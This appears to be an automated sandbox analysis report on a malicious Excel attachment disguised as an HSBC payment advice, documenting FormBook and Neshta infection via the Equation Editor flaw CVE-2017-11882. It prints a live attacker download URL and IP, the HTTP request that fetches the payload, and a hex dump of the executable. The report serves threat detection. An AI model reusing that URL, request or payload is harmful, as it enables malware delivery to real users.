Windows Analysis Report Payment Advice HSBC.xlsx

Overview

General Information

Sample Name: Payment Advice HSBC.xlsx
Analysis ID: 528781
MD5: e8e4ccc6201dd1b16a2133ba56441a5b
SHA1: f73a1fd7b0aea60425fef3e155cce42e2edfac21
SHA256: f1da130d39c64d903450d67844ba701667cce9b057eeac8283393c5d2673b5e5
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook Neshta
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Neshta
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Infects executable files (exe, dll, sys, html)
Drops PE files with a suspicious file extension
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Drops executable to a common third party application directory
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Unable to load, office file is protected or invalid
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
PE file does not import any functions
Installs a raw input device (often for capturing keystrokes)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Office Equation Editor has been started
Drops PE files to the user directory
PE file overlay found
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: Payment Advice HSBC.xlsx Virustotal: Detection: 34% Perma Link
Source: Payment Advice HSBC.xlsx ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://198.12.91.205/50005/vbc.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://198.12.91.205/50005/vbc.exe Virustotal: Detection: 5% Perma Link
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe Joe Sandbox ML: detected
Source: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe Joe Sandbox ML: detected
Source: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe Joe Sandbox ML: detected
Source: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe Joe Sandbox ML: detected
Source: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXE Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.0.vbc.exe.400000.11.unpack Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.5.unpack Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.9.unpack Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.17.unpack Avira: Label: W32/Delf.I
Source: 5.2.vbc.exe.400000.1.unpack Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.19.unpack Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.13.unpack Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.7.unpack Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.15.unpack Avira: Label: W32/Delf.I

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Spreading:

barindex
Yara detected Neshta
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Infects executable files (exe, dll, sys, html)
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\setup.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{e2803110-78b3-4664-a479-3611a381656a}\VC_redist.x86.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\elevation_service.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateCore.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\updater.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.EXE Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WksConv\Wkconv.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\Install\{FCE087CB-E39B-4153-8CDB-9F0ACA90F73B}\GoogleUpdateSetup.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateComRegisterShell64.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\wow_helper.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Oracle\Java\javapath_target_415196\java.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\WinDirStat\windirstat.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\chrmstp.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler64.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\WinDirStat\Uninstall.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Oracle\Java\javapath_target_415196\javaws.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\notification_helper.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdate.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateOnDemand.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Oracle\Java\javapath_target_415196\javaw.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\VC_redist.x64.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\1.3.36.102\GoogleUpdateSetup.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\chrome_pwa_launcher.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateBroker.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateSetup.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 5_2_00405080 FindFirstFileA,FindNextFileA,FindClose, 5_2_00405080
Source: C:\Users\Public\vbc.exe Code function: 5_2_00405634 FindFirstFileA,FindNextFileA,FindClose, 5_2_00405634
Source: C:\Users\Public\vbc.exe Code function: 5_2_00404F6C FindFirstFileA,FindClose, 5_2_00404F6C
Source: C:\Users\Public\vbc.exe Code function: 5_2_004056A7 FindFirstFileA,FindNextFileA,FindClose, 5_2_004056A7
Source: C:\Users\Public\vbc.exe Code function: 5_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA, 5_2_00406D40
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\BIN\1033\ Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\BIN\ Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Folders\ Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Folders\1033\ Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\ Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\ Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 198.12.91.205:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 198.12.91.205:80

Networking:

barindex
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 18:05:27 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11Last-Modified: Thu, 25 Nov 2021 03:22:49 GMTETag: "b7200-5d1947d38df57"Accept-Ranges: bytesContent-Length: 750080Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 89 01 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 66 0b 00 00 0a 00 00 00 00 00 00 72 85 0b 00 00 20 00 00 00 a0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 85 0b 00 4f 00 00 00 00 a0 0b 00 70 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 65 0b 00 00 20 00 00 00 66 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 70 06 00 00 00 a0 0b 00 00 08 00 00 00 68 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0b 00 00 02 00 00 00 70 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 85 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 54 21 01 00 03 00 00 00 8c 01 00 06 00 6a 02 00 20 1b 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 1
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /50005/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.91.205Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5AE55544.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /50005/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.91.205Connection: Keep-Alive

